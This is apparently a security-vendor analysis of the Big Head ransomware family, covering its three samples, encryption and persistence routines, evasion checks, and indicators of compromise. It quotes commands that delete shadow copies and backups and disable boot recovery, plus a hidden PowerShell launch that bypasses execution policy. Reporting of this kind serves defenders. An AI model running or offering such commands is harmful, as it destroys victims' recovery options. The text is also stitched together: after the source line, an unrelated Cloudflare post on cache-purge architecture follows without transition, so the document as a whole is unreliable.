Tailing Big Head Ransomware’s Variants, Tactics, and Impact

By: Ieriz Nicolle Gonzalez, Katherine Casona, Sarah Pearl Camiling
July 07, 2023

We analyze the technical details of a new ransomware family named Big Head. In this entry, we discuss the Big Head ransomware’s similarities and distinct markers that add more technical details to initial reports on the ransomware.

Reports of a new ransomware family and its variant named Big Head emerged in May, with at least two variants of this family being documented. Upon closer examination, we discovered that both strains shared a common contact email in their ransom notes, leading us to suspect that the two different variants originated from the same malware developer. Looking into these variants further, we  uncovered a significant number of versions of this malware. In this entry, we go deeper into the routines of these variants, their similarities and differences, and the potential impact of these infections when abused for attacks.

Analysis

In this section, we go expound on the three samples of Big Head we found, as well as their distinct functions and routines. While we continue to investigate and track this threat, we also highly suspect that all three samples of the Big Head ransomware are distributed via malvertisement as fake Windows updates and fake Word installers.

First sample

fig1-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 1. The infection routine of the first Big Head ransomware sample

The first sample of Big Head ransomware (SHA256: 6d27c1b457a34ce9edfb4060d9e04eb44d021a7b03223ee72ca569c8c4215438, detected by Trend Micro as Ransom.MSIL.EGOGEN.THEBBBC) featured a .NET compiled binary file. This binary checks the mutex name 8bikfjjD4JpkkAqrz using CreateMutex and terminates itself if the mutex name is found.

fig2-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 2. Calling CreateMutex function
fig3-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 3. MTX value “8bikfjjD4JpkkAqrz”

The sample also has a list of configurations containing details related to the installation process. It specifies various actions such as creating a registry key, checking the existence of a file and overwriting it if necessary, setting system file attributes, and creating an autorun registry entry. These configuration settings are separated by the pipe symbol “|” and are accompanied by corresponding strings that define the specific behavior associated with each action.

fig4-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 4. List of configurations

The format that the malware adheres to in terms of its behavior upon installation is as follows:

[String ExeName] [bool StartProcess] [bool CheckFileExists] [bool SetSystemAttribute] [String FilePath] [bool SetRegistryKey] [None]

Additionally, we noted the presence of three resources that contained data resembling executable files with the “*.exe” extension:

  • 1.exe drops a copy of itself for propagation. This is a piece of ransomware that checks for the extension “.r3d” before encrypting and appending the “.poop” extension.
  • Archive.exe drops a file named teleratserver.exe, a Telegram bot responsible for establishing communication with the threat actor’s chatbot ID.
  • Xarch.exe drops a file named BXIuSsB.exe, a piece of ransomware that encrypts files and encodes file names to Base64. It also displays a fake Windows update to deceive the victim into thinking that the malicious activity is a legitimate process.

These binaries are encrypted, rendering their contents inaccessible without the appropriate decryption mechanism.

fig5-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 5. Three resources found in the main sample
fig6-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 6. The encrypted content of one of the files located within the resource section (“1.exe”)

To extract the three binaries from the resources, the malware employs AES decryption with the electronic codebook (ECB) mode. This decryption process requires an initialization vector (IV) for proper decryption.

It is also noteworthy that the decryption key used is derived from the MD5 hash of the mutex 8bikfjjD4JpkkAqrz. This mutex is a hard-coded string value wherein its MD5 hash is used to decrypt the three binaries 1.exe, archive.exe, and Xarch.exe. It is important to note that the MTX value and the encrypted resources are different per sample.

We manually decrypted the content within each binary by exclusively utilizing the MD5 hash of the mutant name. Once this step was completed, we proceeded with the AES decryption to decrypt the encrypted resource file. 

fig7-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 7. Code for decrypting the three binaries (top) and the decrypted binary file that came from the parent file (bottom)

The following table shows the details of the binaries dropped by the decrypted malware using the MTX value 8bikfjjD4JpkkAqrz. These three binaries exhibit similarities with the parent sample in terms of code structure and binary extraction:

File nameBytesDropped file
1.exe2334881.exe
archive.exe12843536teleratserver.exe
Xarch.exe65552BXIuSsB.exe
fig8-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 8. 1.exe (left), teleratserver.exe (middle), and BXIuSsB.exe (right)

Binaries

This section details the binaries dropped, as identified from the previous table, and the first binary, 1.exe, was dropped by the parent sample.

            1.      Binary: 1.exe
                    Bytes: 222224
                    MTX value that was used to decrypt this file: 2AESRvXK5jbtN9Rvh

Initially, the file will hide the console window by using WinAPI ShowWindow with SW_HIDE (0). The malware will create an autorun registry key, which allows it to execute automatically upon system startup. Additionally, it will make a copy of itself, which it will save as discord.exe in the <%localappdata%> folder in the local machine.

fig9-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 9. ShowWindow API code hides the window of the current process (top) and the creation of the registry key and drops a copy of itself as “discord.exe” (bottom)

The Big Head ransomware checks for the victim’s ID in %appdata%\ID. If the ID exists, the ransomware verifies the ID and reads the content. Otherwise, it creates a randomly generated 40-character string and writes it to the file %appdata%\ID as a type of infection marker to identify its victims.

fig10-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 10. Randomly generating the 40-character string ID (top) and file named ID saved in the “<%appdata%>” folder (bottom)

The observed behavior indicates that files with the extension “.r3d” are specifically targeted for encryption using AES, with the key derived from the SHA256 hash of “123” in cipher block chaining (CBC) mode. As a result, the encrypted files end up having the “.poop” extension appended to them.

fig11-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 11. The malware checks for the extension that contains “.r3d” before encrypting and appending the ”.poop” extension (top) and the file encryption process when the file extension “.r3d” exists (bottom).

In this file, we also observed how the ransomware deletes its shadow copies. The command used to delete shadow copies and backups, which is also used to disable the recovery option is as follows:

/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

It drops the ransom note on the desktop, subdirectories, and the %appdata% folder. The Big Head ransomware also changes the wallpaper of the victim’s machine. 

fig12-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 12. Ransom note of the “1.exe” binary
fig13-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 13. The wallpaper that appears on the victim’s machine

Lastly, it will execute the command to open a browser and access the malware developer’s Telegram account at hxxps[:]//t[.]me/[REDACTED]_69. Our analysis showed no particular action or communication being exchanged with this account in addition to the redirection.

        2.     Binary: teleratserver.exe
                Bytes: 12832480
                MTX value that was used to decrypt this file: OJ4nwj2KO3bCeJoJ1

Teleratserver is a 64-bit Python-compiled binary that acts as a communication channel between the threat actor and the victim via Telegram. It accepts the commands “start”, “help”, “screenshot”, and “message”.

fig14-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 14. Decompiled Python script from the binary

    3.      Binary: BXIuSsB.exe
             Bytes: 54288
             MTX value that was used to decrypt this file: gdmJp5RKIvzZTepRJ

The malware displays a fake Windows Update UI to deceive the victim into thinking that the malicious activity is a legitimate software update process, with the percentage of progress in increments of 100 seconds.

fig15-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 15. The code responsible for fake update (left) and the fake update shown to the user (right)

The malware terminates itself if the user’s system language matches the  Russian, Belarusian, Ukrainian, Kazakh, Kyrgyz, Armenian, Georgian, Tatar, and Uzbek country codes. The malware also disables the Task Manager to prevent users from terminating or investigating its process.

fig16-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 16. The “KillCtrlAltDelete” command responsible for disabling the Task Manager

The malware drops a copy of itself in the hidden folder <%temp%\Adobe> that it created, then creates an entry in the RunOnce registry key, ensuring that it will only run once at the next system startup.

fig17-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 17. Creation of AutoRun registry

The malware also randomly generates a 32-character key that will later be used to encrypt files. This key will then be encrypted using RSA-2048 with a hard-coded public key.

The ransomware then drops the ransom note that includes the encrypted key.

fig18-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 18. The ransom note

The malware avoids the directories that contain the following substrings:

  • WINDOWS or Windows
  • RECYCLER or Recycler
  • Program Files
  • Program Files (x86)
  • Recycle.Bin or RECYCLE.BIN
  • TEMP or Temp
  • APPDATA or AppData
  • ProgramData
  • Microsoft
  • Burn

By excluding these directories from its malicious activities, the malware reduces the likelihood of being detected by security solutions installed in the system and increases its chances of remaining undetected and operational for a longer duration. The following are the extensions that the Big Head ransomware encrypts:

“.mdf”, “.db”, “.mdb”, “.sql”, “.pdb”, “.pdb”, “.pdb”, “.dsk”, “.fp3”, “.fdb”, “.accdb”, “.dbf”, “.crd”, “.db3”, “.dbk”, “.nsf”, “.gdb”, “.abs”, “.sdb”, “.sdb”, “.sdb”, “.sqlitedb”, “.edb”, “.sdf”, “.sqlite”, “.dbs”, “.cdb”, “.cdb”, “.cdb”, “.bib”, “.dbc”, “.usr”, “.dbt”, “.rsd”, “.myd”, “.pdm”, “.ndf”, “.ask”, “.udb”, “.ns2”, “.kdb”, “.ddl”, “.sqlite3”, “.odb”, “.ib”, “.db2”, “.rdb”, “.wdb”, “.tcx”, “.emd”, “.sbf”, “.accdr”, “.dta”, “.rpd”, “.btr”, “.vdb”, “.daf”, “.dbv”, “.fcd”, “.accde”, “.mrg”, “.nv2”, “.pan”, “.dnc”, “.dxl”, “.tdt”, “.accdc”, “.eco”, “.fmp”, “.vpd”, “.his”, “.fid”

The malware also terminates the following processes:

“taskmgr”, “sqlagent”, “winword”, “sqlbrowser”, “sqlservr”, “sqlwriter”, “oracle”, “ocssd”, “dbsnmp”, “synctime”, “mydesktopqos”, “agntsvc.exeisqlplussvc”, “xfssvccon”, “mydesktopservice”, “ocautoupds”, “agntsvc.exeagntsvc”, “agntsvc.exeencsvc”, “firefoxconfig”, “tbirdconfig”, “ocomm”, “mysqld”, “sql”, “mysqld-nt”, “mysqld-opt”, “dbeng50”, “sqbcoreservice”

The malware renames the encrypted files using Base64. We observed the malware using the LockFile function which encrypts files by renaming them and adding a marker. This marker serves as an indicator to determine whether a file has been encrypted. Through further examination, we saw the function checking for the marker inside the encrypted file. When decrypted, the marker can be matched at the end of the encrypted file.

fig19-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 19. The LockFile function
fig20-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 20. Checking for the marker “###” (top) and finding the marker at the end of the encrypted file (bottom)

The malware targets the following languages and region or local settings of the current user’s operating system as listed in the following:

“ar-SA”, “ar-AE”, “nl-BE”, “nl-NL”, “en-GB”, “en-US”, “en-CA”, “en-AU”, “en-NZ”, “fr-BE”, “fr-CH”, “fr-FR”, “fr-CA”, “fr-LU”, “de-AT”, “de-DE”, “de-CH”, “it-CH”, “it-IT”, “ko-KR”, “pt-PT”, “es-ES”, “sv-FI”, “sv-SE”, “bg-BG”, “ca-ES”, “cs-CZ”, “da-DK”, “el-GR”, “en-IE”, “et-EE”, “eu-ES”, “fi-FI”, “hu-HU”, “ja-JP”, “lt-LT”, “nn-NO”, “pl-PL”, “ro-RO”, “se-FI”, “se-NO”, “se-SE”, “sk-SK”, “sl-SI”, “sv-FI”, “sv-SE”, “tr-TR”

The ransomware checks for strings like VBOX, Virtual, or VMware in the disk enumeration registry to determine whether the system is operating within a virtual environment. It also scans for processes that contain the following substring: VBox, prl_(parallel’s desktop), srvc.exe, vmtoolsd.

fig21-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 21. Checking for virtual machine identifiers (top) and processes (bottom)

The malware identifies specific process names associated with virtualization software to determine if the system is running in a virtualized environment, allowing it to adjust its actions accordingly for better success or evasion. It can also proceed to delete recovery backup available by using the following command line:

vssadmin delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

After deleting the backup, regardless of the number available, it will proceed to delete itself using the SelfDelete() function. This function initiates the execution of the batch file, which will delete the malware executable and the batch file itself.

fig22-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 22. SelfDelete function

Second sample

The second sample of the Big Head ransomware we observed (SHA256: 2a36d1be9330a77f0bc0f7fdc0e903ddd99fcee0b9c93cb69d2f0773f0afd254, detected by Trend as Ransom.MSIL.EGOGEN.THEABBC) exhibits both ransomware and stealer behaviors.

fig23-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 23. The infection routine of the second sample of the Big Head ransomware

The main file drops and executes the following files:

  • %TEMP%\runyes.Crypter.bat
  • %AppData%\Roaming\azz1.exe
  • %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Server.exe

The ransomware activities are carried out by runyes.Crypter.bat and azz1.exe, while Server.exe is responsible for collecting information for stealing.

The file runyes.Crypter.bat drops a copy of itself and Cipher.psm1 and then executes the following command to begin encryption:

cmd  /c powershell -executionpolicy bypass -win hidden -noexit -file cry.ps1

The malware employs the AES algorithm to encrypt files and adds the suffix “.poop69news@[REDACTED]” to the encrypted files. It specifically targets files with the following extensions:

*.aif ,*.cda ,*.mid ,*.midi ,*.mp3 ,*.mpa ,*.ogg ,*.wav ,*.wma ,*.wpl ,*.7z ,*.arj ,*.deb ,*.pkg ,*.rar ,*.rpm ,*.tar ,*.gz ,*.z ,*.zip ,*.bin ,*.dmg ,*.iso ,*.toas ,*.vcd ,*.csv  ,*.dat ,*.db ,*.dbf ,*.log ,*.mdb ,*.sav ,*.sql ,*.tar ,*.xml ,*.email ,*.eml ,*.emlx ,*.msg ,*.oft ,*.ost ,*.pst ,*.vcf ,*.apk ,*.bat ,*.bin ,*.cgi ,*.pl ,*.com ,*.exe ,*.gadget ,*.jar ,*.msi ,*.py ,*.wsf ,*.fnt ,*.fon ,*.otf ,*.ttf ,*.ai ,*.bmp ,*.gif ,*.ico ,*.jpeg ,*.jpg ,*.png ,*.ps ,*.psd ,*.svg ,*.tif ,*.tiff ,*.asp ,*.aspx ,*.cer ,*.cfm ,*.cgi ,*.pl ,*.css ,*.htm ,*.html ,*.js ,*.jsp ,*.part ,*.php ,*.py ,*.rss ,*.xhtml ,*.key ,*.odp ,*.pps ,*.ppt ,*.pptx ,*.c ,*.class ,*.cpp ,*.cs ,*.h ,*.java ,*.pl ,*.sh ,*.swift ,*.vb ,*.ods ,*.xls ,*.xlsm ,*.xlsx ,*.bak ,*.cab ,*.cfg ,*.cpl ,*.cur ,*.dll ,*.dmp ,*.drv ,*.icns ,*.icoini ,*.lnk ,*.msi ,*.sys ,*.tmp ,*.3g2 ,*.3gp ,*.avi ,*.flv ,*.h264 ,*.m4v ,*.mkv ,*.mov ,*.mp4 ,*.mpg ,*.mpeg ,*.rm ,*.swf ,*.vob ,*.wmv ,*.doc ,*.docx ,*.odt ,*.pdf ,*.rtf ,*.tex ,*.txt ,*.wpd ,*.ps1 ,*.cmd ,*.vbs ,*.vmxf ,*.vmx ,*.vmsd ,*.vmdk ,*.nvram ,*.vbox

The file azz1.exe, which is also involved in other ransomware activities, establishes a registry entry at <HKCU\Software\Microsoft\Windows\CurrentVersion\Run>. This entry ensures the persistence of a copy of itself. It also drops a file containing the victim’s ID and a ransom note:

fig24-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 24. The ransom note for the second sample of the Big Head ransomware

Like the first sample, the second sample also changes the victim’s desktop wallpaper. Afterward, it will open the URL hxxps[:]//github[.]com/[REDACTED]_69 using the system’s default web browser. As of this writing, the URL is no longer available.

Other variants of this ransomware used the dropper azz1.exe as well, although the specific file might differ in each binary. Meanwhile, Server.exe, which we have identified as the WorldWind stealer, collects the following data:

  • Browsing history of all available browsers
  • List of directories
  • Replica of drivers
  • List of running processes
  • Product key
  • Networks
  • Screenshot of the screen after running the file

Third sample

The third sample (SHA256: 25294727f7fa59c49ef0181c2c8929474ae38a47b350f7417513f1bacf8939ff, detected by Trend as Ransom.MSIL.EGOGEN.YXDEL) includes a file infector we identified as Neshta in its chain.

fig25-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 25. The infection routine of the third sample of the Big Head ransomware

Neshta is a virus designed to infect and insert its malicious code into executable files. This malware also has a characteristic behavior of dropping a file called directx.sys, which contains the full path name of the infected file that was last executed. This behavior is not commonly observed in most types of malware, as they typically do not store such specific information in their dropped files.

Incorporating Neshta into the ransomware deployment can also serve as a camouflage technique for the final Big Head ransomware payload. This technique can make the piece of malware appear as a different type of threat, such as a virus, which can divert the prioritization of security solutions that primarily focus on detecting ransomware.

Notably, the ransom note and wallpaper associated with this binary are different from the ones previously mentioned.

fig26-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 26. Wallpaper (top) and ransom note (bottom) used in the victim’s machine post infection

The Big Head ransomware exhibits unique behaviors during the encryption process, such as displaying the Windows update screen as it encrypts files to deceive users and effectively locking them out of their machines, renaming the encrypted files using Base64 encoding to provide an extra layer of obfuscation, and as a whole making it more challenging for users to identify the original file names and types of encrypted files. We also noted the following significant distinctions among the three versions of the Big Head ransomware:

  • The first sample incorporates a backdoor in its infection chain.
  • The second sample employs a trojan spy and/or info stealer.
  • The third sample utilizes a file infector. 

Threat actor

The ransom note clearly indicates that the malware developer utilizes both email and Telegram for communication with their victims. Upon further investigation with the given Telegram username, we were directed to a YouTube account.

The account on the platform is relatively new, having joined on April 19, 2023, With a total of 12 published videos as of this writing. This YouTube channel showcases demonstrations of the piece of malware the cybercriminals have. We also noted that in a pinned comment on each of their videos, they explicitly state their username on Telegram. 

fig27-big-head-ransomware-variants-tactics-impact-worldwind-stealer-neshta
Figure 27. A new YouTube account with a number of videos featuring pieces of malware (top) and a Telegram username pinned in the comments section for all videos (bottom)

While we suspect that this actor engages in transactions on Telegram, it is worth noting that the YouTube name “aplikasi premium cuma cuma” is a phrase in Bahasa that translates to “premium application for free.” While it is possible, we can only speculate on any connection between the ransomware and the countries that use the said language.

Insights

Aside from the specific email address to tie all the samples of the Big Head ransomware together, the ransom notes from the samples have the same bitcoin wallet and drops the same files. Looking at the samples altogether, we can see that all the routines have the same structure in the infection process that it follows once the ransomware infects a system.

The malware developers mention in the comment section of their YouTube videos that they have a “new” Telegram account, indicative of an old one previously used. We also checked their Bitcoin wallet history and found transactions made in 2022. While we’re unaware of what those transactions are, the history implies that these cybercriminals are not new at this type of threats and attacks, although they might not be sophisticated actors as a whole.

The discovery of the Big Head ransomware as a developing piece of malware prior to the occurrence of any actual attacks or infections can be seen as a huge advantage for security researchers and analysts. Analysis and reporting of the variants provide an opportunity to analyze the codes, behaviors, and potential vulnerabilities. This information can then be used to develop countermeasures, patch vulnerabilities, and enhance security systems to mitigate future risks.

Moreover, advertising on YouTube without any evidence of “successful penetrations or infections” might seem premature promotional activities from a non-technical perspective. From a technical point of view, these malware developers left recognizable strings, used predictable encryption methods, or implementing weak or easily detectable evasion techniques, among other “mistakes.”

However, security teams should remain prepared given the malware’s diverse functionalities, encompassing stealers, infectors, and ransomware samples. This multifaceted nature gives the malware the potential to cause significant harm once fully operational, making it more challenging to defend systems against, as each attack vector requires separate attention.

Indicators of Compromise (IOCs)

You can download the IOCs here

Tailing Big Head Ransomware’s Variants, Tactics, and Impact

Indicators of Compromise (IOCs)

Filename				SHA256									Detection			Description
Read Me First!.txt			Ransom note
1.exe 					6d27c1b457a34ce9edfb4060d9e04eb44d021a7b03223ee72ca569c8c4215438	Ransom.MSIL.EGOGEN.THEBBBC 	First sample
1.exe 					226bec8acd653ea9f4b7ea4eaa75703696863841853f488b0b7d892a6be3832a	Ransom.MSIL.EGOGEN.YXDFE	
123yes.exe 				ff900b9224fde97889d37b81855a976cddf64be50af280e04ce53c587d978840	Ransom.MSIL.EGOGEN.YXDEO	
archive.exe 				cf9410565f8a06af92d65e118bd2dbaeb146d7e51de2c35ba84b47cfa8e4f53b	Ransom.MSIL.EGOGEN.YXDFZ	
azz1.exe, discord.exe 			1c8bc3890f3f202e459fb87acec4602955697eef3b08c93c15ebb0facb019845	Ransom.MSIL.EGOGEN.YXDEW	
BXIuSsB.exe 				64246b9455d76a094376b04a2584d16771cd6164db72287492078719a0c749ab	Ransom.MSIL.EGOGEN.YXDEL	
ConsoleApp2.exe 			0dbfd3479cfaf0856eb8a75f0ad4fccb5fd6bd17164bcfa6a5a386ed7378958d	Ransom.MSIL.EGOGEN.YXDEW	
cry.ps1 				6698f8ffb7ba04c2496634ff69b0a3de9537716cfc8f76d1cfea419dbd880c94	Ransom.PS1.EGOGEN.YXDFV	
Cipher.psm1, 													Ransom.PS1.EGOGEN.YXDFZ	
discord.exe 				b8e456861a5fb452bcf08d7b37277972a4a06b0a928d57c5ec30afa101d77ead	Ransom.MSIL.EGOGEN.YXDEL	
discord.exe 				6b3bf710cf4a0806b2c5eaa26d2d91ca57575248ff0298f6dee7180456f37d2e	Ransom.MSIL.EGOGEN.YXDEL	
docx.Crypter.bat, runyes.Crypter.bat 	6b771983142c7fa72ce209df8423460189c14ec635d6235bf60386317357428a	Ransom.BAT.EGOGEN.YXDFZ 	
event-stream.exe 			627b920845683bd7303d33946ff52fb2ea595208452285457aa5ccd9c01c3b0a	HackTool.Win32.EventStream.A	
l.bat 					40d11a20bd5ca039a15a0de0b1cb83814fa9b1d102585db114bba4c5895a8a44	Ransom.BAT.EGOGEN.YXDFZ	
Locker.ps1 				159fbb0d04c1a77d434ce3810d1e2c659fda0a5703c9d06f89ee8dc556783614	Ransom.PS1.EGOGEN.YXDEL	
locker.ps1 				9aa38796e0ce4866cff8763b026272eb568fa79d8a147f7d61824752ad6d8f09	Ransom.PS1.EGOGEN.YXDFZ	
program.exe 				39caec2f2e9fda6e6a7ce8f22e29e1c77c8f1b4bde80c91f6f78cc819f031756	Ransom.MSIL.EGOGEN.YXDEP	
Prynts.exe 				1ada91cb860cd3318adbb4b6fd097d31ad39c2718b16c136c16407762251c5db	TrojanSpy.MSIL.STORMKITTY.D	
r.pyw 					be6416218e2b1a879e33e0517bcacaefccab6ad2f511de07eebd88821027f92d	Ransom.Python.EGOGEN.YXDFZ 	
Server.exe 				9a7889147fa53311ba7ec8166c785f7a935c35eba4a877c1313a8d2e80e3230d	TrojanSpy.MSIL.WORLDWIND.A	Dropped WorldWind Stealer
Server.exe  				f6a2ec226c84762458d53f5536f0a19e34b2a9b03d574ae78e89098af20bcaa3	PE_NESHTA.A	
sfchost.exe, 12.exe 			1942aac761bc2e21cf303e987ef2a7740a33c388af28ba57787f10b1804ea38e	Ransom.MSIL.EGOGEN.YXDEL	
slam.exe 				f354148b5f0eab5af22e8152438468ae8976db84c65415d3f4a469b35e31710f	Ransom.MSIL.EGOGEN.YXDE4	
ssissa.Crypter.bat  			037f9434e83919506544aa04fecd7f56446a7cc65ee03ac0a11570cf4f607853	Ransom.BAT.EGOGEN.YXDFZ	
svchost.com 				980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2	PE_NESHTA.A-O	
teleratserver.exe 			603fcc53fd7848cd300dad85bef9a6b80acaa7984aa9cb9217cdd012ff1ce5f0	Backdoor.WIn64.TELERAT.A	
Xarch.exe     				bcf8464d042171d7ecaada848b5403b6a810a91f7fd8f298b611e94fa7250463	Ransom.MSIL.EGOGEN.YXDEV	
XarchiveOutput.exe			64aac04ffb290a23ab9f537b1143a4556e6893d9ff7685a11c2c0931d978a931	Ransom.MSIL.EGOGEN.YXDEV	
Xatput.exe 				f59c45b71eb62326d74e83a87f821603bf277465863bfc9c1dcb38a97b0b359d	Ransom.MSIL.EGOGEN.YXDEV	
Xserver.exe 				2a36d1be9330a77f0bc0f7fdc0e903ddd99fcee0b9c93cb69d2f0773f0afd254	Ransom.MSIL.EGOGEN.THEABBC	Second sample
Xsput.exe 				66bb57338bec9110839dc9a83f85b05362ab53686ff7b864d302a217cafb7531	Ransom.MSIL.EGOGEN.YXDEV	
Xsuut.exe 				806f64fda529d92c16fac02e9ddaf468a8cc6cbc710dc0f3be55aec01ed65235	Ransom.MSIL.EGOGEN.YXDEV	
Xxut.exe 				9c1c527a826d16419009a1b7797ed20990b9a04344da9c32deea00378a6eeee2	Ransom.MSIL.EGOGEN.YXDEO 	
iXZAF					40e5050b894cb70c93260645bf9804f50580050eb131e24f30cb91eec9ad1a6e	Ransom.MSIL.EGOGEN.THFBIBC	
XBtput.exe 				25294727f7fa59c49ef0181c2c8929474ae38a47b350f7417513f1bacf8939ff	Ransom.MSIL.EGOGEN.YXDEL	Third sample
XBtput2.exe 				dcfa0fca8c1dd710b4f40784d286c39e5d07b87700bdc87a48659c0426ec6cb6	Ransom.MSIL.EGOGEN.YXDEO	

Source :
https://www.trendmicro.com/it_it/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html

Part 2: Rethinking cache purge with a new architecture

21/06/2023

In Part 1: Rethinking Cache Purge, Fast and Scalable Global Cache Invalidation, we outlined the importance of cache invalidation and the difficulties of purging caches, how our existing purge system was designed and performed, and we gave a high level overview of what we wanted our new Cache Purge system to look like.

It’s been a while since we published the first blog post and it’s time for an update on what we’ve been working on. In this post we’ll be talking about some of the architecture improvements we’ve made so far and what we’re working on now.

Cache Purge end to end

We touched on the high level design of what we called the “coreless” purge system in part 1, but let’s dive deeper into what that design encompasses by following a purge request from end to end:

Step 1: Request received locally

An API request to Cloudflare is routed to the nearest Cloudflare data center and passed to an API Gateway worker. This worker looks at the request URL to see which service it should be sent to and forwards the request to the appropriate upstream backend. Most endpoints of the Cloudflare API are currently handled by centralized services, so the API Gateway worker is often just proxying requests to the nearest “core” data center which have their own gateway services to handle authentication, authorization, and further routing. But for endpoints which aren’t handled centrally the API Gateway worker must handle authentication and route authorization, and then proxy to an appropriate upstream. For cache purge requests that upstream is a Purge Ingest worker in the same data center.

Step 2: Purges tested locally

The Purge Ingest worker evaluates the purge request to make sure it is processible. It scans the URLs in the body of the request to see if they’re valid, then attempts to purge the URLs from the local data center’s cache. This concept of local purging was a new step introduced with the coreless purge system allowing us to capitalize on existing logic already used in every data center.

By leveraging the same ownership checks our data centers use to serve a zone’s normal traffic on the URLs being purged, we can determine if those URLs are even cacheable by the zone. Currently more than 50% of the URLs we’re asked to purge can’t be cached by the requesting zones, either because they don’t own the URLs (e.g. a customer asking us to purge https://cloudflare.com) or because the zone’s settings for the URL prevent caching (e.g. the zone has a “bypass” cache rule that matches the URL). All such purges are superfluous and shouldn’t be processed further, so we filter them out and avoid broadcasting them to other data centers freeing up resources to process more legitimate purges.

On top of that, generating the cache key for a file isn’t free; we need to load zone configuration options that might affect the cache key, apply various transformations, et cetera. The cache key for a given file is the same in every data center though, so when we purge the file locally we now return the generated cache key to the Purge Ingest worker and broadcast that key to other data centers instead of making each data center generate it themselves.

Step 3: Purges queued for broadcasting

purge request to small colo, ingest worker sends to queue worker in T1

Once the local purge is done the Purge Ingest worker forwards the purge request with the cache key obtained from the local cache to a Purge Queue worker. The queue worker is a Durable Object worker using its persistent state to hold a queue of purges it receives and pointers to how far along in the queue each data center in our network is in processing purges.

The queue is important because it allows us to automatically recover from a number of scenarios such as connectivity issues or data centers coming back online after maintenance. Having a record of all purges since an issue arose lets us replay those purges to a data center and “catch up”.

But Durable Objects are globally unique, so having one manage all global purges would have just moved our centrality problem from a core data center to wherever that Durable Object was provisioned. Instead we have dozens of Durable Objects in each region, and the Purge Ingest worker looks at the load balancing pool of Durable Objects for its region and picks one (often in the same data center) to forward the request to. The Durable Object will write the purge request to its queue and immediately loop through all the data center pointers and attempt to push any outstanding purges to each.

While benchmarking our performance we found our particular workload exhibited a “goldilocks zone” of throughput to a given Durable Object. On script startup we have to load all sorts of data like network topology and data center health–then refresh it continuously in the background–and as long as the Durable Object sees steady traffic it stays active and we amortize those startup costs. But if you ask a single Durable Object to do too much at once like send or receive too many requests, the single-threaded runtime won’t keep up. Regional purge traffic fluctuates a lot depending on local time of day, so there wasn’t a static quantity of Durable Objects per region that would let us stay within the goldilocks zone of enough requests to each to keep them active but not too many to keep them efficient. So we built load monitoring into our Durable Objects, and a Regional Autoscaler worker to aggregate that data and adjust load balancing pools when we start approaching the upper or lower edges of our efficiency goldilocks zone.

Step 4: Purges broadcast globally

multiple regions, durable object sends purges to fanouts in other regions, fanout sends to small colos in their region

Once a purge request is queued by a Purge Queue worker it needs to be broadcast to the rest of Cloudflare’s data centers to be carried out by their caches. The Durable Objects will broadcast purges directly to all data centers in their region, but when broadcasting to other regions they pick a Purge Fanout worker per region to take care of their region’s distribution. The fanout workers manage queues of their own as well as pointers for all of their region’s data centers, and in fact they share a lot of the same logic as the Purge Queue workers in order to do so. One key difference is fanout workers aren’t Durable Objects; they’re normal worker scripts, and their queues are purely in memory as opposed to being backed by Durable Object state. This means not all queue worker Durable Objects are talking to the same fanout worker in each region. Fanout workers can be dropped and spun up again quickly by any metal in the data center because they aren’t canonical sources of state. They maintain queues and pointers for their region but all of that info is also sent back downstream to the Durable Objects who persist that data themselves, reliably.

But what does the fanout worker get us? Cloudflare has hundreds of data centers all over the world, and as we mentioned above we benefit from keeping the number of incoming and outgoing requests for a Durable Object fairly low. Sending purges to a fanout worker per region means each Durable Object only has to make a fraction of the requests it would if it were broadcasting to every data center directly, which means it can process purges faster.

On top of that, occasionally a request will fail to get where it was going and require retransmission. When this happens between data centers in the same region it’s largely unnoticeable, but when a Durable Object in Canada has to retry a request to a data center in rural South Africa the cost of traversing that whole distance again is steep. The data centers elected to host fanout workers have the most reliable connections in their regions to the rest of our network. This minimizes the chance of inter-regional retries and limits the latency imposed by retries to regional timescales.

The introduction of the Purge Fanout worker was a massive improvement to our distribution system, reducing our end-to-end purge latency by 50% on its own and increasing our throughput threefold.

Current status of coreless purge

We are proud to say our new purge system has been in production serving purge by URL requests since July 2022, and the results in terms of latency improvements are dramatic. In addition, flexible purge requests (purge by tag/prefix/host and purge everything) share and benefit from the new coreless purge system’s entrypoint workers before heading to a core data center for fulfillment.

